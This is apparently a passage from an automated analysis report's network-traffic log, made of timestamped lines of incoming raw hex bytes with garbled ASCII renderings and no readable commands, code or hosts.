2023-10-13 13:21:15 UTC	8302	IN	Data Raw: 45 7b 39 f5 a2 51 da 5f 0e 23 4c f6 76 cb f1 bc 5d 06 64 02 7f 16 a5 e2 f8 61 f2 f6 a5 c8 e1 db 6c c3 d2 0a 11 29 3b 1f 40 72 0d 57 97 b1 33 62 6b 7f 97 74 91 c0 76 67 5c 42 a7 0d 3c 09 05 a5 d1 6a 00 93 40 f1 48 d9 e9 82 2f 09 36 cc 97 e9 77 10 e9 80 59 de 4f b5 01 a9 fa 10 1c 9e 2b 5d fc 19 7d 9a 3a 28 b2 07 a6 cd 3b 8a 0b 54 a3 52 90 22 79 d1 30 8c 46 2a 2b c9 33 20 70 42 d6 19 9b b1 ff 7b d8 5e b0 f1 46 ef e7 f8 84 a4 85 cb 43 ea 61 2f 0e 1c ef 01 68 88 38 a3 83 f0 2d f2 2d 08 b5 07 d6 17 d3 dc 09 e0 93 fc 36 f0 0e 6c 96 13 38 5d 8f 53 78 c4 d8 27 cb 05 c2 a9 db 36 91 31 eb ee 27 84 ad a6 4f 8a 07 b7 9b c8 b1 f1 9c 53 a7 7d a4 1f 44 1a 17 55 1f 26 a5 ce 78 e7 eb e7 b0 44 99 27 ae 72 38 ae cf 51 84 9b 02 e7 06 16 03 0c 1e ce 8e 37 e6 fc 84 ed 4a f6 0c Data Ascii: E{9Q_#Lv]dal);@rW3bktvg\B<j@H/6wYO+]}:(;TR"y0F*+3 pB{^FCa/h8--6l8]Sx'61'OS}DU&xD'r8Q7J
2023-10-13 13:21:15 UTC	8318	IN	Data Raw: ef 4a dc 41 44 9f f1 df 0a d8 0e 95 29 71 dd 2d 13 1e aa 8f 94 49 45 05 72 e4 5b c5 8f b0 cf 46 c3 a0 ea f1 95 0c e8 fb 77 4e db c2 8c 4a 3a 71 fb 02 c7 d1 82 db e0 8a 4c ce 2f 6b e3 4b 64 c5 b5 9f 33 1a 9a f8 16 37 f0 13 87 ef 00 7a b5 5a 35 b4 37 e1 ed d2 ce 3b 37 a5 7d f3 96 be 8c 92 86 59 26 b7 01 8f cb fd f7 2c 8f 42 36 86 3c fa 55 3a 37 b2 d8 90 ca 14 23 76 aa 18 24 72 6e df 62 d6 37 27 d7 65 86 17 14 29 df 37 d0 2f a5 fd f4 26 89 13 e8 48 65 e9 ec 9f 37 d6 df 40 70 82 a0 d7 25 94 0a aa e8 c1 d7 e8 01 28 27 0c c6 9c 08 8e f7 cd 87 d8 b5 5e 40 69 a7 ba 81 32 25 31 c9 1f c1 c1 22 c1 14 2f ef 0f b1 2d 8c a4 53 a0 f1 d0 dc 5d 06 23 80 b0 7e 4b f5 b4 ed 3b 45 9e 42 cb c0 df a0 39 0d a3 fa 20 55 93 f1 f2 8b 11 a4 d4 c1 8f 4e c5 1e 2e c7 91 ea ed 23 1c b1 Data Ascii: JAD)q-IEr[FwNJ:qL/kKd37zZ57;7}Y&,B6<U:7#v$rnb7'e)7/&He7@p%('^@i2%1"/-S]#~K;EB9 UN.#
2023-10-13 13:21:15 UTC	8334	IN	Data Raw: 1e 6a b7 e8 0c 0b cd 4d d8 cf bb 2f 97 af 54 59 2a c8 f8 a7 c6 c3 c2 c2 b9 19 ff b5 ae cf b3 90 3c bb 31 cf 8c cf 3f 50 38 93 07 d6 c9 c4 c1 cf e2 9b a2 3e 33 64 ac e5 5e 01 3e 24 a3 70 21 fa 18 19 a5 98 6a 35 15 96 cf d3 82 16 62 5a e8 b8 44 71 c8 6b 9e 0c 9f f8 57 b8 2a 3e b5 b1 d0 76 3c 71 25 c3 83 89 9f 52 48 fc 6a 06 08 f2 c0 63 a9 92 37 61 7f 6c 50 f9 dc cb 75 b8 f3 65 d7 38 e9 7b ec 8b 7a 73 b5 a5 2d 79 21 b2 c7 62 e1 71 ed fa ac e8 cb 4b 55 94 fd 7c a3 54 bd 1b 5b 79 a7 c9 0d 9b af b1 90 57 aa 88 87 30 d0 3f 74 60 b8 4e 5e 16 70 ba cf 71 6d 62 fc 45 84 4a e0 cc fe a4 af c4 21 9a 65 e0 8a a1 16 3b 6f f5 86 c5 24 0c cb 7a 1b 3f 91 00 db 63 32 18 24 8c 5b 02 a1 aa 88 0d d2 d4 54 5d fa b9 6f d7 20 8e a1 cf 04 6d c5 70 1f dc 97 a6 07 f9 4f 2a fb 23 4d Data Ascii: jM/TY<1?P8>3d^>$p!j5bZDqkW>v<q%RHjc7alPue8{zs-y!bqKU\|T[yW0?t`N^pqmbEJ!e;o$z?c2$[T]o mpO*#M
2023-10-13 13:21:15 UTC	8350	IN	Data Raw: a8 14 ef fb b2 e7 c3 6c 99 62 85 69 06 f3 6e 62 39 43 ba f4 72 f3 ad 80 d6 c4 31 89 62 cd 54 74 52 f4 4f c4 a4 1d d3 e2 36 74 22 34 47 91 89 f5 61 5c a6 2f 80 80 5c a1 a8 81 ea 3c 2c 4c c4 ab 28 c2 d2 aa 83 cc de 17 b0 33 f5 59 98 42 09 a9 41 06 01 8a b0 ef a3 4d ab 34 5e 4b 45 a4 97 8f 02 72 2e a9 c6 dd d2 0a 4b c4 90 b1 61 5c 2f 2d 74 8f 71 1e 26 73 19 69 df d4 cb 29 4f 05 4b 86 54 e0 6c 85 69 95 03 21 1e a8 36 e8 55 ad e7 59 38 c4 e9 eb 02 fe 1c 55 21 12 c6 78 a2 db 16 34 74 c8 ae 64 32 03 cc b1 49 0f bc aa 73 c8 e5 fa ed f2 2d ac a4 66 13 b3 b5 dd 61 06 7b 81 1d bc 51 37 27 34 01 67 fb d5 5a f7 fe f2 79 aa 74 aa 75 51 1b b6 7a ef f4 29 a3 08 81 35 ec 52 0b e0 c3 c5 d1 97 66 64 5b d3 38 10 7e f9 8b a8 b0 b7 43 a6 66 f9 ea 94 24 76 0f 3b 56 2f 76 fb aa Data Ascii: lbinb9Cr1bTtRO6t"4Ga\/\<,L(3YBAM4^KEr.Ka\/-tq&si)OKTli!6UY8U!x4td2Is-fa{Q7'4gZytuQz)5Rfd[8~Cf$v;V/v
2023-10-13 13:21:15 UTC	8366	IN	Data Raw: 1f 4f 53 46 36 f4 6c 72 09 30 78 4f fd 48 7c 99 d1 f7 fe f8 a9 ff 78 5f c9 40 75 60 d5 38 13 c1 68 2f 64 e9 07 e2 9d 4a 34 2f 2c 2f 1e 19 fb 16 f8 32 43 53 e7 c6 c4 4d 32 1e 0e 1b 28 63 de 58 65 c3 df 0c f1 14 c4 f1 fb ff 78 80 a1 3c 2a 65 ce f7 29 2a 04 73 56 7d b5 0d 07 4f 9e f5 42 23 f0 62 ce a8 36 ba 53 24 a2 2a ea dd 4f 18 c8 96 79 82 d4 e7 34 55 56 5a e1 76 f8 63 1d 68 6e 1d 62 a6 4e 3c b2 d0 84 20 ba a8 63 b8 e9 82 8b 83 e3 c3 73 0e 14 50 9d 09 28 06 c5 a0 a2 fb a7 e8 f7 e8 aa ff a7 be c8 3d 19 6d 03 40 ba 65 d6 f0 8c 73 39 7d 18 b9 ca a3 f0 4a 1a b5 49 6c 7f 1d 63 95 1e 0a 3b 2d f0 d3 1d 2d a0 28 97 5b aa 85 ac b2 8d 8a 06 7e f9 9a 36 f4 56 64 2f 5a 12 c7 27 05 04 c4 d4 13 cc c5 69 ea b3 f0 e8 e9 5c a7 b3 f7 ef cb e1 56 5d f5 bb 84 6a 2f 63 e4 96 Data Ascii: OSF6lr0xOH\|x_@u`8h/dJ4/,/2CSM2(cXex<e)sV}OB#b6S$*Oy4UVZvchnbN< csP(=m@es9}JIlc;--([~6Vd/Z'i\V]j/c
2023-10-13 13:21:15 UTC	8382	IN	Data Raw: b8 5a 7f 09 19 19 0f d3 5a 1b bd 63 6d c5 f7 d0 51 ff fb 99 2c 7c 51 33 56 3f 23 25 14 26 b0 f4 7b 55 1c 0c d5 bd 94 cb 74 a6 7b 97 3f fb 7d d3 c0 aa 0c da 5a 07 69 25 cb e5 df 89 30 4c e5 fa aa 46 ee 7f 17 b0 11 86 80 78 92 dd 1b db de 04 ad 3d 1e 02 9b c1 bc 2d fb 5d a9 f1 c2 a2 02 73 85 91 1b 63 44 3a 3a ab 63 e9 98 54 b3 c7 83 6a b9 ae 8f 8c 18 e9 ba 04 db 77 c4 6a ff ac c9 24 6c 30 ee b8 d8 5a 28 1d dc 7c 95 3e a1 3b 0e 4a a0 3d bc 92 5e f8 a6 8e c1 81 d7 de 57 a6 0c 09 ea c1 83 e7 1f 1e f1 ac 45 60 f9 4a 67 5c 7c 5d af d0 ff d3 66 1e 3a b4 c9 9b 68 de d2 1f 44 b2 f3 a9 29 43 1a 61 98 33 09 7d 55 d6 66 ab 76 5b 1c 1d f5 fd 4a 07 94 5b 5f 6b 2e ea d0 d3 4a 1e 17 d0 fb 92 90 dc 23 80 5f 67 3f d2 c6 b0 05 5a c8 be 55 74 63 84 9d a0 57 9e 26 28 cc c5 25 Data Ascii: ZZcmQ,\|Q3V?#%&{Ut{?}Zi%0LFx=-]scD::cTjwj$l0Z(\|>;J=^WE`Jg\\|]f:hD)Ca3}Ufv[J[_k.J#_g?ZUtcW&(%
2023-10-13 13:21:15 UTC	8398	IN	Data Raw: 36 bb 7b 1f e4 a4 7f c6 b5 ef 04 87 94 92 77 27 1a 1a f9 b8 8f 92 b0 dc 7b 8f 53 e6 11 41 2c fd f1 55 ed 39 33 34 3f ff a7 e4 9f 71 57 9b ac 93 0d d9 fe 81 18 d8 72 24 39 56 a7 6e 4f b6 82 7f 39 59 1b b2 c9 ab a8 64 ce 74 2a 2c 5a 4e 58 d4 12 f5 0e c5 45 58 36 c9 30 3a 23 cf ae 3d 49 74 84 fd 12 cc 08 d8 fd 09 f2 b5 93 76 fa 4a 7a c2 2b d1 dd 93 64 f3 a0 ee 1e f2 a7 4a 0e 36 f3 a3 c9 ba 98 25 54 4b ea 5c 19 3e bc 42 49 d0 1c 37 3c 49 aa 8e b3 a4 a2 be 90 85 a9 36 c6 ce 7d 28 49 4f d0 a7 c3 c8 0e 49 70 99 18 19 5d f4 19 1d e1 96 3e e9 3b 46 67 e9 b6 cf e4 cf cc af 22 7c 0d 8f 4c a5 7a da 98 5a b6 52 b3 24 15 37 9d fd 92 13 bb d1 b6 45 f3 b6 be 28 38 68 94 81 93 d1 0a 90 91 03 30 82 bc 85 99 fd 5a 0b 06 b2 92 20 1b 32 ce 9e cc cb 38 a8 af 35 40 a3 71 e4 14 Data Ascii: 6{w'{SA,U934?qWr$9VnO9Ydt*,ZNXEX60:#=ItvJz+dJ6%TK\>BI7<I6}(IOIp]>;Fg"\|LzZR$7E(8h0Z 285@q
2023-10-13 13:21:15 UTC	8414	IN	Data Raw: 27 a3 b2 5e fe 29 1e af a4 ba e4 32 0c 9b 87 69 ee fd 9e 78 21 4b d4 2c e9 58 65 d8 60 67 c3 3f 14 9d b6 62 50 23 06 41 70 20 85 b7 4e 9a cf 98 fd ce f9 55 fd 2d cc 6f ed a3 a9 c4 1c e5 d4 e6 7a f0 ef 37 0a b5 be 28 80 65 8a 5a 50 f3 bb b0 94 3d 81 50 90 bd d4 b2 a3 ba 46 d9 b7 29 80 3a 80 1d 8d 76 d0 21 f0 6b 86 34 50 c7 74 77 10 48 de 42 64 c6 bd 3e 1f 8f 9e 2d 81 cd e7 99 47 33 8c f2 86 d7 48 30 e1 d3 1c e5 c7 b3 17 61 8d 65 36 e2 26 37 42 03 2d 5e 79 9a 5a 82 71 81 a7 99 4a af 5d b0 bc 2b 9c 33 5a cd b3 8f 59 9d 79 29 d5 da 9d 08 6f fe 0e 3b 35 f1 98 16 ae f3 de 92 3d b0 f8 c7 0d 66 e1 64 17 74 e2 a7 c7 f5 a6 cf 71 d8 12 e4 d0 7b 8a 04 80 1b 23 b0 5d 5b 16 63 aa cb 66 72 a6 c9 1f 15 5e 1b bc 62 5e 28 87 e2 c4 77 02 7d 9b 76 09 75 8e 04 77 5f 7c e8 49 Data Ascii: '^)2ix!K,Xe`g?bP#Ap NU-oz7(eZP=PF):v!k4PtwHBd>-G3H0ae6&7B-^yZqJ]+3ZYy)o;5=fdtq{#][cfr^b^(w}vuw_\|I
2023-10-13 13:21:15 UTC	8430	IN	Data Raw: b8 dc ec ac 6d 37 f5 9e 8a 47 d8 14 64 4d d0 ab 91 77 32 4e 2a 4a 23 0b db de 66 00 98 46 c0 44 d1 b2 73 52 a9 85 df 5d b8 c3 ba 25 13 99 04 54 4c 36 a7 5f 2d a1 d1 53 78 10 e3 f1 be 7c e9 80 48 e7 a3 19 d7 55 30 1a fb 78 69 47 69 c6 b0 dc f2 9f 90 94 04 67 57 9c 05 21 2c f2 37 f9 69 c6 b6 e2 3a 5b 1c 7f d7 c3 f5 d8 40 5c ad b0 01 93 bb 86 19 df ca a6 68 45 86 5e 08 c8 68 4c 70 2d f2 1f e6 de fa ea f0 4c ec 72 57 3a 95 8b f0 79 75 7d 0a 18 da a1 cd 84 d0 4c 0f d8 64 e1 68 ae cc 0b b3 5e 53 6a b1 67 fc d2 f0 d7 be dc 6b 72 b7 50 b9 08 9b f9 c0 f0 74 c8 ea 61 58 7a db ef 57 bf 5d 4c d0 53 e9 a6 5b 08 fd c4 54 74 25 bb d7 80 77 16 01 be c6 ed ea 9f ec 78 6c 00 41 a1 1c b5 db 94 14 75 ab 01 93 8b b8 a9 b6 46 42 a6 fc e2 65 7e 62 66 f9 2a 5f 49 7b 5e 8d 0e be Data Ascii: m7GdMw2NJ#fFDsR]%TL6_-Sx\|HU0xiGigW!,7i:[@\hE^hLp-LrW:yu}Ldh^SjgkrPtaXzW]LS[Tt%wxlAuFBe~bf_I{^
2023-10-13 13:21:15 UTC	8446	IN	Data Raw: 08 bc a5 6e ab 07 4a 7e 4b ce cc b9 bd 2d e4 1a ee 0a 5d d1 83 d8 b9 c8 dc 83 ee 91 70 b3 c7 fd 00 14 9f 24 33 82 3c 4b fc af a8 02 b7 45 2a 7d 8a 67 e0 ef 50 aa 26 8a 42 f4 91 8b 97 ed 92 c8 11 b2 e8 d5 8e a9 5e e3 18 9e bf cf 8a 2c 95 85 cd 77 39 12 db 4a 80 68 8d a4 3f b9 ba a7 ff 82 96 9b f0 62 43 c4 c2 a1 fe fa 1a fe 47 53 51 b3 0a 03 f1 16 2a c8 8b 2e 6a de f6 3b 51 08 9a 12 1a 65 16 d9 d6 0c dd d0 03 b5 9c 4a f7 74 7e a8 1e 16 b1 f8 32 43 4e 48 d5 96 7c 85 d3 a7 da 2f 7e 36 00 80 26 96 95 21 a0 5c 6c de c7 cf 6a 0b e9 b7 55 b9 48 3f be 14 bb 83 1d 0e b3 82 02 52 fe ee 60 a3 a2 2b fb 5a 66 97 34 87 89 94 6a e2 cc ff 6c 12 5e a4 df 2a 01 6b c1 a5 a8 5a 9e 81 9c 06 57 6b f2 f1 9f 4e 88 63 41 83 0a d3 23 39 de 4d 65 f3 0f 3d 91 da 6a 0d 23 e7 29 49 83 Data Ascii: nJ~K-]p$3<KE}gP&B^,w9Jh?bCGSQ.j;QeJt~2CNH\|/~6&!\ljUH?R`+Zf4jl^*kZWkNcA#9Me=j#)I
2023-10-13 13:21:15 UTC	8462	IN	Data Raw: cc b1 ec c6 78 65 7f c6 4a 81 3c 48 b9 dc bc 42 96 ce f6 e1 52 df 48 7e 48 9b a1 f7 e9 35 71 9b a5 05 ab 5b cd 25 7c 8e 52 22 f2 03 d4 b5 7a c0 ce 05 75 19 6f cb f9 b1 29 f3 a0 f5 d2 fc 92 b2 6f 0b b3 74 6b b3 c6 41 27 88 e9 56 eb 71 55 8c 63 62 16 ca 08 89 d0 2b 64 c7 1b 1c 26 a9 fd 9e f3 a2 b9 82 a8 e8 04 ef 61 aa f4 1f 57 af 8e 56 bc 27 b8 a9 92 04 a5 61 17 3d 1e 1a 28 4f f8 70 d7 1a a1 c5 25 5b 37 05 c1 64 5d ea 13 57 e2 a1 72 5c 74 14 6e 49 12 b0 aa fa f7 c1 c8 d2 f1 88 8c 0e 0f 05 66 39 d6 d3 38 9c 2c 20 0b fa 8c a7 67 5f 94 b7 51 fe d6 be f3 e2 d9 ec 6b ac bf 17 49 e7 a8 a6 d8 42 5b 70 c7 ab 59 68 3f 94 3f 10 11 80 ff 01 f9 be 54 17 f3 be ff 51 f6 34 34 eb e7 18 3f 9c 3c fc 85 f6 e5 05 0d 86 54 d4 2b 69 04 3a 8e 62 fc a2 54 f7 fc e3 64 59 62 60 a0 Data Ascii: xeJ<HBRH~H5q[%\|R"zuo)otkA'VqUcb+d&aWV'a=(Op%[7d]Wr\tnIf98, g_QkIB[pYh??TQ44?<T+i:bTdYb`
2023-10-13 13:21:15 UTC	8478	IN	Data Raw: 45 fa 52 6d f6 2d d2 2e 39 3a 4d 4e cd fe 59 6e 57 06 23 21 a6 6f 31 4c 02 79 ec 52 8e a0 2b d4 85 6e 35 c6 1f 31 34 14 9b 73 c9 92 b0 11 0e cf 0b ed 9d 8d 4a 2c 5f ac 43 80 a9 66 66 50 93 7b 2a 77 68 89 29 87 42 62 e3 bb ab 98 58 a7 95 e8 92 e3 42 78 9a 58 83 a3 25 41 5c 1d 50 e1 eb 37 08 f2 63 89 97 90 5d 8c 8a 99 6b 27 ef 6f 64 23 6f da 03 c9 06 30 0f 97 20 2e 3e a4 9a e5 47 19 11 90 7b e4 b2 a7 f3 6e 3a f7 aa 1f 94 3c f4 bc 1a ee 0a 40 77 f4 d5 e5 1d fc 59 eb eb 88 3b e2 50 dd d9 0a f7 09 de 20 54 77 dd 4c 5d d0 73 c1 9f 82 30 8f d4 e3 fa 14 2a 02 b6 20 b9 fa 56 74 0b 8e a7 cc ac 3f b5 8e 0a d1 b3 9d 1b 3c 9a da d0 5c 39 e8 aa 3d 92 f9 6e 48 12 a0 a7 59 6e e4 88 27 f9 54 44 e9 de 6a f8 54 3f 96 98 61 dc c3 18 5d 19 80 e8 e2 0f 94 4a 57 36 fa ad e4 7d Data Ascii: ERm-.9:MNYnW#!o1LyR+n514sJ,_CffP{wh)BbXBxX%A\P7c]k'od#o0 .>G{n:<@wY;P TwL]s0 Vt?<\9=nHYn'TDjT?a]JW6}
2023-10-13 13:21:16 UTC	8494	IN	Data Raw: b0 42 6b f6 5d 78 04 16 f7 f0 50 d0 b3 b4 97 6e b1 20 de c6 5d 82 51 78 ca bd 00 7e 23 eb 2a 7d cd 6b a3 5c c5 c0 7f d4 e4 08 8f 7a 59 66 70 c9 71 ae 7d 14 55 ec 53 e6 4e db 76 5a f6 39 46 87 09 c5 24 7f d5 81 f9 5b 05 0c 40 46 72 a4 19 40 a7 c7 fc cf db 5e a3 e4 f7 95 ad 0a 90 ad a4 ea 9e 0d 83 6a 19 69 73 b5 39 be 92 f1 91 c2 a4 5f bb 04 11 6b 7c 05 bf f9 5c bd a8 44 1f 94 4a d6 8b 36 34 13 d9 a2 27 6a bc 7f d4 d1 7a 17 a0 f1 ee 64 2e 50 9a 27 33 3f 1d 85 b3 c7 db b6 40 3d 04 f6 d2 b8 3a c5 f4 17 8e 6f 84 10 16 94 d2 68 2f d6 c1 57 50 28 cb c7 d7 b8 b4 6b 53 d3 34 fc d1 85 97 16 ff 8f 9b 23 c0 4e 01 d4 ab 13 db 0a e9 14 11 01 81 be 31 ab 48 9d 06 b7 80 01 53 f3 d7 59 d6 31 34 4b 70 a0 cd dc e2 b6 e4 f9 f8 62 8a fa 2d fc 00 c6 a2 5a ca 61 e3 6f ed 7b e3 Data Ascii: Bk]xPn ]Qx~#*}k\zYfpq}USNvZ9F$[@Fr@^jis9_k\|\DJ64'jzd.P'3?@=:oh/WP(kS4#N1HSY14Kpb-Zao{
2023-10-13 13:21:16 UTC	8510	IN	Data Raw: bc 26 91 3f 98 38 46 2a ba 96 12 49 e8 47 1c 1e 18 8b 6c 82 b2 a9 10 d1 d5 77 73 50 9e 5b a7 63 50 9a c9 99 c9 70 b0 b9 bc 13 e7 26 5e cc e2 8d 65 bd 92 7c 2e 3f 12 a1 e6 8b 87 14 a6 d7 fc 08 c8 56 d0 f7 f6 2a 88 34 98 7e d9 0b 9d 2b 55 8e 27 93 80 4a 64 d0 56 c2 01 0f 83 cc 80 b1 4a 9a 42 73 21 4f e3 6d 14 47 76 c4 de 67 0e 3b 1f 61 e1 ae 34 a5 cc 81 0e f6 a5 ee 54 71 9a c6 f7 b5 73 79 d8 85 76 35 85 75 bc de d6 03 ac 63 14 0b 03 74 6f 05 4e 58 5f 19 6d 43 60 6b db 7a ef 65 ac d4 25 e0 89 c2 e8 94 ab 12 ed e1 5d b6 7c 07 d0 58 d6 01 0f 0b 6b 0a cc e1 67 eb 89 93 d4 3f 20 e4 28 bf 45 08 1a 7e 33 11 3c 1d 5e d1 b5 f9 05 f6 f6 01 8e f1 fa 2f 12 16 f2 0b e3 c9 98 21 da 15 de f1 c7 01 12 46 59 75 a4 8e 72 4b 41 dd ff b0 f9 18 7e c4 f2 c7 50 d5 4b db 44 cb e3 Data Ascii: &?8FIGlwsP[cPp&^e\|.?V4~+U'JdVJBs!OmGvg;a4Tqsyv5uctoNX_mC`kze%]\|Xkg? (E~3<^/!FYurKA~PKD
2023-10-13 13:21:16 UTC	8526	IN	Data Raw: a4 f4 d5 5b 7b d7 7b d4 71 00 17 e6 ed bf ee e3 69 de 05 a3 12 53 9f b1 07 18 15 8a 2c 34 45 6e 7c 5d ec 89 77 63 80 9a c2 e9 db b6 a4 11 c7 ff e1 22 fc 5e 36 71 d1 c5 c9 61 2f 9e 98 bb 0f e1 3c 64 82 36 8f ca a5 b1 c4 f7 3d 9f c7 dd c7 80 95 d2 b4 bb 2a 1e 0c 75 75 8d 6f 66 39 54 4b 6d f5 10 2e cb e6 12 4a af d5 6e 6d a7 9f 24 ec 4c bf 5d a5 15 ba 11 98 60 d2 2a 53 10 48 cf 6f ef 44 28 94 58 6c 49 52 85 a2 63 34 7a 3e 55 a9 f9 92 04 40 72 06 7c 07 c8 e0 d6 9c ce 25 0f 06 12 6f fd 77 6a 6f 23 de 76 85 ad 14 50 a3 27 9f 99 b7 0e 8f 45 77 f1 7a ed 01 97 68 b4 79 39 d8 7f 8c 78 e8 79 22 5f c9 a0 7c 8c 7c 8a 04 d4 d2 b7 45 8d 29 24 49 50 26 93 4c 81 f4 8e 30 56 1f 7e d1 0a 4c 65 18 5e 43 76 c9 6f 41 10 7f af 45 67 e0 e2 d7 35 f9 c6 18 9a ad 55 bb bb 74 e6 ee Data Ascii: [{{qiS,4En\|]wc"^6qa/<d6=uuof9TKm.Jnm$L]`SHoD(XlIRc4z>U@r\|%owjo#vP'Ewzhy9xy"_\|\|E)$IP&L0V~Le^CvoAEg5Ut
2023-10-13 13:21:16 UTC	8542	IN	Data Raw: 8c 96 9c ee 88 a2 ee 1e 8a 2b 44 16 c2 ca d7 e6 67 b5 3d a4 2e 1b 6c 44 aa e5 44 a1 9e 61 38 13 17 41 12 82 a4 8a 5b 6a 1f 26 b8 46 75 bb 0e 81 cf c2 f6 22 ee eb 53 ff 7d 23 c7 57 ae 00 e6 02 31 81 10 85 50 36 09 b6 b3 cd 93 4a 43 67 2f 1c 0b 01 c3 53 f2 dc f8 41 c6 2f e7 3a 60 a3 ae 09 e6 0c 84 0e d7 b4 f9 d1 6b e7 6b 52 2e 49 f6 c1 ba 7b c0 aa 67 c5 91 26 d7 c1 25 c4 fe 57 7a 4f 4c ac 54 2d c8 78 19 f0 ba 37 7f b5 d0 06 d3 5f 37 c7 50 79 73 14 16 52 b1 df f0 e7 07 fa 6e 5f 60 fd 2e 38 79 ac ba ba 12 45 ed e3 20 88 7a e4 a5 a4 45 d8 f4 c4 40 67 bd b6 77 a6 e6 53 7f 8d 3a 14 24 d6 ac 5b 6a 80 00 c3 54 bc 58 c5 01 34 a2 1a 0b 9c e0 14 29 b1 43 f8 fd ee c9 7b 8d c6 ea 3f 3d 3c 0b cc 3d 0c 40 9a 2b ad 69 e3 62 f0 52 88 f8 97 f0 b9 84 21 67 3d f9 76 0c f8 56 Data Ascii: +Dg=.lDDa8A[j&Fu"S}#W1P6JCg/SA/:`kkR.I{g&%WzOLT-x7_7PysRn_`.8yE zE@gwS:$[jTX4)C{?=<=@+ibR!g=vV
2023-10-13 13:21:16 UTC	8558	IN	Data Raw: 62 73 f7 1d 2f 49 98 ac b1 cf e6 6a b2 7d 69 ee 5e ea 3a f5 24 4c 2f 59 6f af 04 6d cc 6f aa 9d 28 54 49 71 2b bb bb cc 60 b8 44 22 17 3f 0a ea 4e 95 ac 96 a9 0b 61 2f e3 3e c6 d5 5c 21 86 15 dd 39 aa ec 14 ac cc 58 03 4f 06 f6 7f da dc 91 21 d2 11 3f 10 cd e0 18 d2 41 bd 59 80 69 93 be d7 61 88 a2 6f 4f 19 e5 c5 a9 18 bf d2 b2 d7 b6 2b 88 39 e6 5a 8e 1f c3 aa dc 5e f2 c4 4e 0c 4f d5 ab 0b 44 95 ef 35 6e c9 36 95 45 f2 3d 8b c9 79 40 91 a6 02 1d 67 6c c9 17 72 34 5b 04 ae 4d 11 ce 40 44 20 11 cf 36 b4 95 7f ed ea 14 7f 57 6a 43 87 fe 6d 14 eb 76 c0 b5 4b 28 e1 0d 81 96 0d 17 13 51 c2 91 ae d1 0c 84 eb d1 22 b6 9d ad 76 5c 9d c0 3b be f8 e5 7e 96 7d 8e 5d ae 75 98 12 b4 e4 ad 45 b9 e7 f5 b9 4b c2 e4 bf 89 b8 0f 7a 46 f6 9d 37 2f 51 20 9b ca b2 55 a3 04 a5 Data Ascii: bs/Ij}i^:$L/Yomo(TIq+`D"?Na/>\!9XO!?AYiaoO+9Z^NOD5n6E=y@glr4[M@D 6WjCmvK(Q"v\;~}]uEKzF7/Q U
2023-10-13 13:21:16 UTC	8574	IN	Data Raw: d6 ae 33 48 a5 29 6f 59 ef d7 3a 87 c2 20 a6 a2 81 a2 54 90 a0 58 5c 6d e6 e4 e6 ed 17 49 d0 0f 46 89 d6 c7 1b 2f 0c 61 9e f8 78 9c 92 db 54 1f 7d 50 f6 37 f0 6f 69 c7 78 70 f5 c2 12 6d 47 d5 51 e1 00 d0 35 76 66 c8 b0 11 3c a8 02 01 5b a6 f9 51 70 d1 9d c6 45 13 14 67 1d 0b 64 c3 47 95 5b 14 15 5e 1e a6 75 3a 4e 6d 33 11 58 be 25 61 17 72 63 95 1c af 9f ad 7a b5 28 e0 49 86 7f f9 16 3d c9 87 ef fb 18 d7 29 02 02 ec 2f b3 24 00 a5 7f db 0c 28 b5 21 17 21 06 2c c2 24 2f ef d9 fe a5 8e 08 4c 80 20 c8 9f 97 6f ee 96 23 88 70 85 e6 05 eb 91 30 55 e5 da f1 b2 ec 6a da b0 0a d8 46 02 cd 61 a1 88 cb 73 f1 04 bb 56 73 79 15 c7 81 92 11 6c a9 33 78 5c c1 36 9f 4e 94 d6 8c ae b0 c7 66 a5 12 ce 1b d4 94 2b 43 f5 52 01 ca e6 ea ec 01 f1 14 3d 60 46 72 a5 47 22 40 59 Data Ascii: 3H)oY: TX\mIF/axT}P7oixpmGQ5vf<[QpEgdG[^u:Nm3X%arcz(I=)/$(!!,$/L o#p0UjFasVsyl3x\6Nf+CR=`FrG"@Y
2023-10-13 13:21:16 UTC	8590	IN	Data Raw: 58 cd fb c1 2c 78 1a b0 01 ee 3e 74 5a 18 2c 88 0a 18 1b cd 94 e2 90 a4 ca e3 af e4 2f ad 31 84 16 c2 04 17 6e a3 d5 34 fa ff 5a 02 78 7e c9 1d ee b9 32 3e 4a 77 d8 28 f2 75 dd 83 d3 7d bc e6 b8 04 b3 c4 21 c3 06 9c 31 cf fe 6d 45 17 72 7c f7 a4 75 f3 9e 77 f2 eb 92 61 8e 8b 2d 88 09 e2 eb 78 15 37 7c b2 dd b0 85 82 71 09 3a 31 92 37 45 d1 c8 28 c2 79 d1 e5 40 26 22 90 6f c6 0e 05 49 9d 6b 2f 3c 9f b2 ad d9 6d a6 fb f0 0e bd c2 ab a6 24 38 0c 2c 88 b4 4f dd 8c 76 24 a4 3a 47 30 11 d8 8f 57 92 e1 3c 88 8c 5d 21 42 7f d2 07 e1 64 40 9c 90 ac 06 7f a6 43 de 56 69 a7 47 b0 ab 4a 47 de eb 72 15 6b 98 45 e6 82 9e 3e 95 2d f3 d3 8a 80 d0 d5 20 62 1a c0 49 b9 27 04 a2 ef f2 19 5c b0 aa 33 a8 2f 13 af a5 0a 3c 38 19 98 99 6a 16 62 cb 97 72 58 a7 8e fd 64 6c 7b 3a Data Ascii: X,x>tZ,/1n4Zx~2>Jw(u}!1mEr\|uwa-x7\|q:17E(y@&"oIk/<m$8,Ov$:G0W<]!Bd@CViGJGrkE>- bI'\3/<8jbrXdl{:
2023-10-13 13:21:16 UTC	8606	IN	Data Raw: fc c2 3e b4 ea b3 33 ce a4 d3 99 42 9c 2b 1f bd 2f 2d 31 37 11 a8 0e af ec 0b 5a ea 9c ff c9 a3 b0 4c 59 29 e8 9f 9d 84 54 99 52 b4 01 72 0c 1c 94 32 e7 2c 15 c5 42 e3 97 b1 1e a5 56 3c 96 a3 4e 8c 93 53 4d 14 d7 5a 1a da c5 a7 bf 43 da 41 23 fb ff 52 fa 52 ab 08 a3 c0 a9 bb db 08 72 65 3b 70 b3 6f 53 69 b8 7b cc 01 2d cd 16 10 19 78 8f 74 c5 ed a9 13 20 db f4 64 77 76 8f b6 8f bf 2f 2f 49 19 c6 90 88 52 2c c9 06 b3 00 2a 21 a2 62 0d d2 90 f7 f6 2f 4d df 78 2f 15 41 50 0e d3 ef 9e 70 fe c8 6b 7a 50 89 73 28 bd c6 6f 9e 5b 2a 00 a1 a2 09 0c 7c 2a 5e 09 d4 42 f3 43 39 6a 49 c2 fe e6 01 14 dc 83 a7 5e db 79 88 b6 f5 b4 ef 5e 00 fc 7f 75 8a 13 47 19 b0 5c ff 6f 8f 01 96 49 4b a1 f2 2f d1 46 5c a1 e0 d4 